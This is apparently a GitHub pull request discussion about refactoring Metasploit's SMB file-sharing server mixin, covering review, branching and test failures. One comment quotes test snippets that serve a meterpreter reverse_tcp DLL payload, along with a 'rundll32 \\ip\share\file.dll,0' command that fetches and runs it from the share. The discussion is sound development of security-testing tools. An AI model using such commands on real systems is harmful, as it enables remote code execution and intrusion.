### PR TITLE
First code refactor

### PR DESCRIPTION
**Pull request by jvazquez-r7**
Hello @0x41414141, 

I'm doing a new pull request to you regarding https://github.com/rapid7/metasploit-framework/pull/3074. It includes:

* Update with rapid7 master code, I'm trying to keep the branch up to date, so it's easier to land once we're done.
* A **first** refactoring of the new SMB mixin to share files. 
* Add support to Rex for the SMB templates needed on the code. Parsing strings and creating response with raw strings in lib code isn't desired. It's okey with modules but kinda hard to keep in good share on lib code.

This **isn't** the last pull request. I'm working on this code still! It needs cleanup still, some refactoring, doc and specs. But I think at this moment is good enough to make a new pull request to you, so hopefully you can follow the changes, and warn if I mess something =).

Specially important. I've worked a lot on the handling and dispatching of requests, specially TRANS2 requests, because that code was really hard to follow and keep in shape. I've tried to do my best to simplify that dispatching. I think I've not messed nothing, everything is working on my tests, but worths to review. I'm a little bit concerned about the ```SMB_QUERY_FILE_NETWORK_OPEN_INFO``` requests. I don't think they are necessary for the purpose of this mixin so I've commented them. If maybe you have a test environment where they are needed, please let me know how I can reproduce the test and I'd do!

Finally, if you have feedback about the changes on this pull request, please, feel free to comment. In the meanwhile I keep working on it, so if you try to undo/redo/add/delete some code worths to sync, otherwise then can be a mess :)

I really think we're closer to have this stuff in the framework!!! If we make this pull request to land, the cleanup remaining is minor, and specs and documentation will be the last thing!

### CODE REVIEW

**Comment by jvazquez-r7** [comment]
^^^ @0x41414141 have into account I've added several commits since I've opened the PR, mainly more cleanup, by defining constants and calculating things when building packets. Just to be sure you're up to date when working with this PR! Thanks!

(btw, don't be annoyed by debug messages or something which need cleanup still, I'm working on it :) as said, there is seveal cleanup to perform still, it's just a milestone!)

**Comment by 0x41414141** [comment]
Wow! Lots of code! Will review today and run my test suite. Hopefully all will pass and can land soon.

**Comment by 0x41414141** [comment]
At first look i'm loving the way the code is structured; much cleaner and easier to understand; however it's broken a few of my test cases (throughout implementation and testing its clear that there are some very subtle changes in OS behaviour when requesting content over SMB, so this isnt so surprising).

Test Cases:
1. 'type \\ip\share\file'
This works *most* of the time, but sometimes will return file not found (maybe once out of 10 attempts).

I'm using this code to test this:
  def primer
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    self.exe_contents = "ABCDEF" 
    print_status("File available on #{unc}...")
  end

When the file not found happens, the OS is trying to do a "query file basic info" which is now a shortcut for "file not found" in ./server/share/information_level/query.rb.

2. 'rundll32 \\ip\share\file.dll,0'

This test doesn't work in any case now and always returns file not found.

I'm using this code to test this (using meterpreter reverse_tcp as the dll payload):
  def primer 
    self.exe_contents = generate_payload_dll
    print_status("File available on #{unc}...")
  end

In this test, the OS *always* tries to do a "query file basic info" first, which is now a shortcut for "file not found" in ./server/share/information_level/query.rb.  I'll look at re-implementing this function in the new code style to correct this.

I'm yet to test a few other modules, but I think getting 'query file basic info' back in is a large enough task at the moment to get these simple tests working consistently.

**Comment by jvazquez-r7** [comment]
Super thanks @0x41414141 I'm going to review these test cases and will update this pull request! I'm going to work on the  "query file basic info" and update PR so hopefully you can continue with your testing :)

**Comment by jvazquez-r7** [comment]
And yeah, restoring the "query file basic info" handler is good enough to work on it before continue testing. Super thanks for the testing and following the "step by step" approach. Otherwise is super hard to make a large (lib) pull request like that going ahead =)

**Comment by jvazquez-r7** [comment]
```At first look i'm loving the way the code is structured; much cleaner and easier to understand``` <== thanks :) I hope we can keep that way :) Otherwise is too hard to keep the lib code in good share! I'm pretty sure we'll make it! Now ball is on my side hehe, I'm going to work on unmessing the "query file basic info" handler!

**Comment by 0x41414141** [comment]
Have fixed several issues so wait for an update from me. Just finishing last tests and will merge my commits.

**Comment by jvazquez-r7** [comment]
cool, I wait for your commits so, pls, do PR to my working branch! : ```jvazquez-r7:review_3074_clean_server```

**Comment by jvazquez-r7** [comment]
^^^ I mean don't just merge and land this PR without review if you add new code! Make a new PR to the working branch, so I can review your changes, land, and then you can land this PR, and finally the original one will be updated :)

**Comment by 0x41414141** [comment]
Done. Should be all green now.

**Comment by jvazquez-r7** [comment]
I don't see the pr :?

**Comment by jvazquez-r7** [comment]
I see it, sorry!

**Comment by jvazquez-r7** [comment]
just noticed my normalization on paths, while reeviewing the rundll tests :-) But you already catched them! That's super!!! :D:D I'm going to review and land! w00t! I'm super happy, we're close! :)

**Comment by jvazquez-r7** [comment]
@0x41414141 I've landed https://github.com/jvazquez-r7/metasploit-framework/pull/24, super thanks!

Feel free to land this one once you feel ready, so we'll have https://github.com/rapid7/metasploit-framework/pull/3074 up to date!

**Comment by jvazquez-r7** [comment]
Hello @0x41414141 I've done several commits after https://github.com/jvazquez-r7/metasploit-framework/commit/6d6d5a7dcabc752c39f008f1fc63acefe71897f2 they belongs to a second refactoring, this time there are not functional changes (or shouldn't :P). I'm just cleaning and doing final code refactoring.

Feel free to land this pull request one you are ready. In the meanwhile I'm finishing the second refactoring. I'd appreciate if, unless I've messed something, there aren't modifications on your side. So I can finish the second refactoring :) Then I'll open a new pull pull request to your repo, so you can review and discuss/propose modifications before we land everything :) Honestly I'm becoming super happy with the resultant code, thanks very much for the hard work!

**Comment by jvazquez-r7** [comment]
Added more refactoring. Work on progress still! Feel free to land this pull request or allow me to finish the refactoring work and then we can land this one with everything! I'll be doing some more commits over the weekend to finish the code and will be ready for your review and in case you have feedback :)

Last commits shouldn't modify behavior, it's just trying to let the code in good shape :) Please allow me to finish the refactoring work before doing modifications to avoid overlapping :)

thanks!

**Comment by jvazquez-r7** [comment]
Hello @0x41414141 I'm done with the second refactoring pass, feel free to review/land when you ready. Once this pull request is ready I'll start another loop, where I'll add documentation for the new mixin and will keep doing some extra (minor) code cleanup! Thanks!
